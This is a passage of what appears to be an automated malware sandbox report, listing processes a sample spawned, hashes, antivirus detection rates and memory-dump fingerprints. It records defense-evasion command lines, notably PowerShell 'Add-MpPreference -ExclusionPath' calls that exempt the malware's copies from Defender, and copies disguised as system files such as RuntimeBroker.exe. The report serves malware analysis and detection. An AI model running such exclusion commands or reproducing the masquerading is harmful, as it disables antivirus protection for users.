                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                                          Imagebase:0x7ff771ec0000
                                          File size:2'759'232 bytes
                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:5
                                          Start time:15:02:06
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:15:02:06
                                          Start date:13/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"
                                          Imagebase:0x7ff7390f0000
                                          File size:52'744 bytes
                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:16
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Imagebase:0xa70000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 68%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:19
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x70000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 68%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:21
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Recovery\RuntimeBroker.exe
                                          Imagebase:0xca0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 68%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:22
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:23
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:24
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:25
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:26
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:27
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:28
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:29
                                          Start time:15:02:07
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:30
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:31
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:32
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Recovery\RuntimeBroker.exe
                                          Imagebase:0x3e0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                                          Imagebase:0x7ff772820000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:15:02:08
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:15:02:09
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\chcp.com
                                          Wow64 process (32bit):false
                                          Commandline:chcp 65001
                                          Imagebase:0x7ff627790000
                                          File size:14'848 bytes
                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:36
                                          Start time:15:02:09
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\w32tm.exe
                                          Wow64 process (32bit):false
                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                          Imagebase:0x7ff6bae80000
                                          File size:108'032 bytes
                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:37
                                          Start time:15:02:14
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff693ab0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:15:02:16
                                          Start date:13/09/2024
                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x7e0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:41
                                          Start time:15:02:19
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x690000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:44
                                          Start time:15:02:24
                                          Start date:13/09/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:45
                                          Start time:15:02:29
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0x3f0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:46
                                          Start time:15:02:43
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x870000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:48
                                          Start time:15:02:54
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0xe10000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:49
                                          Start time:15:03:03
                                          Start date:13/09/2024
                                          Path:C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0x960000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:50
                                          Start time:15:03:11
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0xf60000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:52
                                          Start time:15:03:20
                                          Start date:13/09/2024
                                          Path:C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe"
                                          Imagebase:0xe20000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:53
                                          Start time:15:03:28
                                          Start date:13/09/2024
                                          Path:C:\Recovery\RuntimeBroker.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Recovery\RuntimeBroker.exe"
                                          Imagebase:0x1b0000
                                          File size:3'511'394 bytes
                                          MD5 hash:3C9CF0B38226E2A7F0191A0130536859
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:3.9%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:12
                                            Total number of Limit Nodes:0
                                            execution_graph 22320 7ffd9ba2b8d0 22321 7ffd9ba2b8d6 ResumeThread 22320->22321 22323 7ffd9ba2b9e4 22321->22323 22328 7ffd9ba2a11d 22329 7ffd9ba2a12b SuspendThread 22328->22329 22331 7ffd9ba2a204 22329->22331 22316 7ffd9ba2d675 22317 7ffd9ba2d68f GetFileAttributesW 22316->22317 22319 7ffd9ba2d755 22317->22319 22324 7ffd9ba2ba39 22325 7ffd9ba2ba47 CloseHandle 22324->22325 22327 7ffd9ba2bb24 22325->22327

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70396a04a613651b07a340bb360ce8e3c952bb6562cd5af94e28e59459522832
                                            • Instruction ID: 75de8afce0bb0620455b136cbada7d73451a1330c3d6886e05592514ff1f42c8
                                            • Opcode Fuzzy Hash: 70396a04a613651b07a340bb360ce8e3c952bb6562cd5af94e28e59459522832
                                            • Instruction Fuzzy Hash: F4C11671E09A8D8FE755EBA8E8A57E97BE1FF59304F0402BAD04CC76E2DE7824058741

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 5ddab3ffdc05db640aa3f38ae162dfacb22e9499cea0cabfc230049fc9ec51c5
                                            • Instruction ID: f6f861c3d6ee8f7ef31da667c06dc690dea8871855d060086171fba73bcc67db
                                            • Opcode Fuzzy Hash: 5ddab3ffdc05db640aa3f38ae162dfacb22e9499cea0cabfc230049fc9ec51c5
                                            • Instruction Fuzzy Hash: 1C51AA70D0D78C8FDB99DFA8D855AE9BBF0EF16310F0441ABD049DB2A2DA749846CB11

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 12 7ffd9ba2a11d-7ffd9ba2a129 13 7ffd9ba2a134-7ffd9ba2a202 SuspendThread 12->13 14 7ffd9ba2a12b-7ffd9ba2a133 12->14 18 7ffd9ba2a204 13->18 19 7ffd9ba2a20a-7ffd9ba2a254 13->19 14->13 18->19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: SuspendThread
                                            • String ID:
                                            • API String ID: 3178671153-0
                                            • Opcode ID: 7c68059b116878e0244c6e1c50ce2622cf73dd913ff17b04a7bab9a6f994f835
                                            • Instruction ID: a4c15b1d437d1f5629405bfb2a1524c98eaf640af21e811494e257f8982b5e9f
                                            • Opcode Fuzzy Hash: 7c68059b116878e0244c6e1c50ce2622cf73dd913ff17b04a7bab9a6f994f835
                                            • Instruction Fuzzy Hash: 60414B70E0864C8FDB58DFA8D895AEDBBF0FF5A310F1041AAD049E7292DA74A845CB41

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 22 7ffd9ba2d675-7ffd9ba2d753 GetFileAttributesW 26 7ffd9ba2d755 22->26 27 7ffd9ba2d75b-7ffd9ba2d799 22->27 26->27
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 1d34b86b4897199723ffe40d98a17b8cb2621f57e912835f3f583b699e0f355c
                                            • Instruction ID: 034cf8f5873650f1130a8af20ea20e9f666c8a581f3594879de40416f7745413
                                            • Opcode Fuzzy Hash: 1d34b86b4897199723ffe40d98a17b8cb2621f57e912835f3f583b699e0f355c
                                            • Instruction Fuzzy Hash: DA411A70E0860C8FDB98DF98D895BEDBBF0FB5A310F10416ED049E7292DA75A885CB41

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: f70a364ca91b69760adf077a655dd405567e6ab2c83095f77c9f4170641f2728
                                            • Instruction ID: 74c8616ad2bb757ec928552507e949705cfdf78985fbbe2a2dfee920b5dcd984
                                            • Opcode Fuzzy Hash: f70a364ca91b69760adf077a655dd405567e6ab2c83095f77c9f4170641f2728
                                            • Instruction Fuzzy Hash: BF518F31E4994E8FDB69DF98D4A15FCB7B1FF54300F1141BAD01AE72A6DA366A01CB40

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 97 7ffd9ba2ba39-7ffd9ba2ba45 98 7ffd9ba2ba50-7ffd9ba2bb22 CloseHandle 97->98 99 7ffd9ba2ba47-7ffd9ba2ba4f 97->99 103 7ffd9ba2bb24 98->103 104 7ffd9ba2bb2a-7ffd9ba2bb7e 98->104 99->98 103->104
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067282656.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9ba20000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 95e5e2b73b821fe4dd3f1d6c2b1dd62fd075afea915abddbadebcb37e1fb9dff
                                            • Instruction ID: 2511dce24587dcc04c7fb8336ce535979f281e9fb74ebde2fad0a6e6954e6c58
                                            • Opcode Fuzzy Hash: 95e5e2b73b821fe4dd3f1d6c2b1dd62fd075afea915abddbadebcb37e1fb9dff
                                            • Instruction Fuzzy Hash: D2416D70D0874C8FDB59DFA8D895BECBBF0EF1A310F1041AAD049D7292DA749985CB41

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: >
                                            • API String ID: 0-325317158
                                            • Opcode ID: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction ID: b86f580b9e4235ae0f65c468915ea83c9d59490da1f154c91c52d97dad46f0a5
                                            • Opcode Fuzzy Hash: 21cff120376562f1612649c8e90d5fce3a5e69d5295b89b098da14a2c6347bbd
                                            • Instruction Fuzzy Hash: 4021BE70A1951E8FEB64EF54C8A87A977B1FB58304F1105F9C40DA3291CB756B84DF50

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e26fbf3a5b263092f5c7dc696d24b501c043dcef7133f35ee42a46a2de95038
                                            • Instruction ID: 655c4180834f5002038b17e99713fbfa68ba5a3663d400449abf7d275fbb25e0
                                            • Opcode Fuzzy Hash: 9e26fbf3a5b263092f5c7dc696d24b501c043dcef7133f35ee42a46a2de95038
                                            • Instruction Fuzzy Hash: 4F413B31F1DA588FDB65EB7C88946A977E1FF5C305B0501BAE09EC72A2DE3498018741
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0209c2c6f7711bca84f6f8f7fb44387e8a60d5024650086318f9e13ad91f1e52
                                            • Instruction ID: fafdaf2b76e90f845f421df77b793176bf84132cbadf93cfb42897d2cd52fbdb
                                            • Opcode Fuzzy Hash: 0209c2c6f7711bca84f6f8f7fb44387e8a60d5024650086318f9e13ad91f1e52
                                            • Instruction Fuzzy Hash: 7A417F71E08A5D8FDB48EFA8E895AEDB7E1FF58314F10017AD019D7296DA346841C780
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1969722106.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b870000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0e0a5933e435c0b2e4287619f872f3f1973860b7cfcefb7903a9797aaf61c56
                                            • Instruction ID: b6b2f09729da75fc32e44af70dc2cf136d06098fe4082abeec0f24a379754fb1
                                            • Opcode Fuzzy Hash: f0e0a5933e435c0b2e4287619f872f3f1973860b7cfcefb7903a9797aaf61c56
                                            • Instruction Fuzzy Hash: 8B417E30E18A1D8FDB58EFA8E895AED77E1FF58314F10017AE01DD3296DE34A8818780
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eb3f4d1e3784667d51eea37a0047de414795a5c1f30a836d404a609d7e27ffd3
                                            • Instruction ID: f51e629934e36deb1026afc04ac8e44276ad758e735205f75fd219a84f3afcd6
                                            • Opcode Fuzzy Hash: eb3f4d1e3784667d51eea37a0047de414795a5c1f30a836d404a609d7e27ffd3
                                            • Instruction Fuzzy Hash: B141393098F7C94FE753D764D8156F53FA0EF43324F0502FAE09A8A0A3D6665616C752
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3c8c422e62395c8d062e5a6425991637c6fc592a6ed8535a33bb53cda2c5c7c6
                                            • Instruction ID: 3909d92e96a740a7451700d023e0af7bcfe3f186fc59e3bcc1577cf0816fd207
                                            • Opcode Fuzzy Hash: 3c8c422e62395c8d062e5a6425991637c6fc592a6ed8535a33bb53cda2c5c7c6
                                            • Instruction Fuzzy Hash: E0414F3260C9498FDF98EF68D4A5DA4B3E1FB6832470402ADD04EC75A2DE35E945CB81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2249227045.00007FFD9BF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9bf80000_84JufgBTrA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fb800dc5bb14d02d51f3decc9633f1a2d38420233cc0f6b5eb5696ec5909f32
                                            • Instruction ID: bed46d479196dfab8f1e6a84f172b96f3070a19475c0007976194821ca4633b2
                                            • Opcode Fuzzy Hash: 5fb800dc5bb14d02d51f3decc9633f1a2d38420233cc0f6b5eb5696ec5909f32
                                            • Instruction Fuzzy Hash: 5A41613260C9498FDF98EF5CD4A6DA4B7E1FF6831070442AED04AC75A2DE35E945CB81
                                            Memory Dump Source
